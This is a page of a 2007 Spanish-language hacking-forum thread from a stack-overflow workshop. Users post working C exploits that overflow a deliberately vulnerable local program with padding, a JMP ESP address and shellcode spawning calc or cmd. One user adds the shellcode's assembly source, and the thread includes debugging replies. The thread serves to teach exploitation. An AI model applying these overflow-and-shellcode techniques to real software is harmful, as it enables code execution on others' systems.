elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  <-!-> Taller de Stack Overflows en Windows, por Rojodos
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 3 4 [5] 6 7 Ir Abajo Respuesta Imprimir
Autor Tema: <-!-> Taller de Stack Overflows en Windows, por Rojodos  (Leído 75,918 veces)
Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.322


Peace & Love


Ver Perfil WWW
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #40 en: 27 Abril 2007, 01:29 am »

Pero si es mayor de 64 no se produce overflow si le metes las mismas As q si es de 64

saludos

Veamos, si tienes un vaso de 64 cc o lo que quieras... y le hechas 64cc de agua, pues esta lleno pero no se sale el agua porque cupo perfectamente, es lo que aguanta. Si le hechas 100cc de agua a un vaso que solamente puede contener 64cc pues se desborda, se produce un overflow. El overflow es poner mas de lo que aguanta. El buffer es de 64, si le pones de mas pues se desborda.
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
M3st4ng

Desconectado Desconectado

Mensajes: 58


Ver Perfil
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #41 en: 27 Abril 2007, 12:55 pm »

 Ok ya entendi todo es que me lie con los arrays de 64 y de 1024 jaja gracias por la ayuda
En línea

_Xerks_

Desconectado Desconectado

Mensajes: 35


Díselo a mi brillante culo metálico.


Ver Perfil
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #42 en: 28 Abril 2007, 21:42 pm »

Hola de nuevo, he cambiado la shellcode para que en lugar de devolvernos al cmd ejecute la calculadora de windows, es una tonteria, pero lo posteo sólo para jugar con el exploit viendo un resultado diferente.

exploit_vuln1_calc.c

Código:
#include <stdio.h>
#include <stdlib.h>

int main (int argc,char **argv) {

    char evilbuffer[1024]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS";

    char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xFB\x63\xC6\x45\xFC\x61\xC6\x45\xFD\x6C\xC6\x45\xFE\x63\x8D\x45\xFB\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";

    char offset[]="\xED\x1E\x95\x7C";
       
    strcat(evilbuffer,offset);
    strcat(evilbuffer,shellcode);
    printf ("Cadena + offset + shellcode en formato printable\n\n");
    printf ("%s", evilbuffer);

   
    argv[0] = "vuln1";
    argv[1] = evilbuffer;
    argv[2] = NULL;
   
    execv ("vuln1.exe",argv);
    }

Un saludo.
En línea

Deka_10

Desconectado Desconectado

Mensajes: 196



Ver Perfil
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #43 en: 20 Junio 2007, 17:40 pm »

la pagina se ha muerto, lo vuelves a subir?
En línea

Islam != Terrorism
sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #44 en: 21 Junio 2007, 04:50 am »

Usa esta:
https://foro.elhacker.net/index.php?action=dlattach;topic=57910.0;attach=673
En línea

R41N-W4R3

Desconectado Desconectado

Mensajes: 248


Ver Perfil
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #45 en: 23 Julio 2007, 13:37 pm »



    Hola, estoy realizando el exploit basico (gracias al texto de rojodos....impresionantemente bien explicado) y tengo el siguiente problema:

    Pego mi codigo antes de nada:
 
 
Código:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main (int argc,char **argv) {

    char evilbuffer[1024]="AAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPPQQQQRRRRSSSS";

    char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45"
"\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45\xF8\x50"
"\xBB\xC7\x93\xBF\x77\xFF\xD3"; [b] //EL OFFSET TAMBIEN LO HE PUESTO BIEN (xC7\x93\xBF\x77)  lo hago con el programa diceoffset [/b]

char offset[]="\x7C\x95\x1E\xED";  [b]  //HE SACADO ESTO EN MI PC CON FINDJMP[/b]
       
    strcat(evilbuffer,offset);
    strcat(evilbuffer,shellcode);
    printf ("Cadena + offset + shellcode en formato printable\n\n");
    printf ("%s", evilbuffer);

   
    argv[0] = "vulnerable";
    argv[1] = evilbuffer;
    argv[2] = NULL;
   
    execv ("vulnerable.exe",argv);
    }
El caso es que al ejecutarlo me peta diciendo: que la instruccion que hace referencia a una direccion de memoria no se puede read.

  Por otro lado, cuando compilo el shell y lo ejecuto se me abre correctamente la shell pero no se me genera el exe. Pego aki el codigo:

   
Código:
#include <stdio.h>
#include <windows.h>

void main () {

LoadLibrary("msvcrt.dll");
__asm{
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
lea eax,[ebp-08h]
push eax
mov ebx,0x77bf93c7
call ebx
}
}


   Saludos y gracias........
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #46 en: 27 Julio 2007, 09:18 am »

Tu error debe estar en la direccion del salto a JMP ESP.. pero.. porque pones el salto a JMP ESP al final del shellcode? :-/ lee otraves el tutorial de rojodos jeje

Citar
Por otro lado, cuando compilo el shell y lo ejecuto se me abre correctamente la shell pero no se
me genera el exe.
si lo pudiste ejecutar, es porque ya se genero un exe.

Saludos!!
En línea

R41N-W4R3

Desconectado Desconectado

Mensajes: 248


Ver Perfil
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #47 en: 27 Julio 2007, 09:28 am »



   En el compilador le doy a ejecutar y me abre la shell...pero aunke le de a build no me sale ningun shell.exe...   cuando lo he ejecutado y pongo en la shell exit para cerrar la ventana msdos me sale el siguiente error:
   
  Debug error!
 
    program....
Module:
File: i386\chkesp.c
Line 42

    the value of ESP was not properly saved across a function call............

 De todas formas estoy empezando desde el principio... y releyendo el tuto....
Gracias por tu ayuda
En línea

gaby-EOF

Desconectado Desconectado

Mensajes: 6


printf("\nit releases your mind");


Ver Perfil
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #48 en: 25 Octubre 2007, 15:00 pm »

exelente tu tutorial rojodos hasta ahora solo tenia una idea muy remota de lo que se tratava stack overflows ahora me quedo clarisimo.

gracias  :xD
En línea

---------------->off line
Sha0

Desconectado Desconectado

Mensajes: 17


Sehr gut !!


Ver Perfil
Re: <-> Taller de Stack Overflows en Windows, por Rojodos
« Respuesta #49 en: 7 Enero 2008, 19:59 pm »

Hehe stack overflow es una tecnica muy antigua,
alguien por aqui esta investigando como petar protecciones grsecurity, safe-SEH, kernel match protection, DEP, ASLR ...

Voy a ir publicando algunas tecnicas en mi blog, os animo a seguir en el tema y  meterle mucha caña a la protarmacion a bajo nivel.

http://jolmos.blogspot.com
En línea

No intentes doblar la cuchara, eso es imposible.
Solo intenta comprender la realidad ...
que no hay cuchara.
-- a hacker --
Páginas: 1 2 3 4 [5] 6 7 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines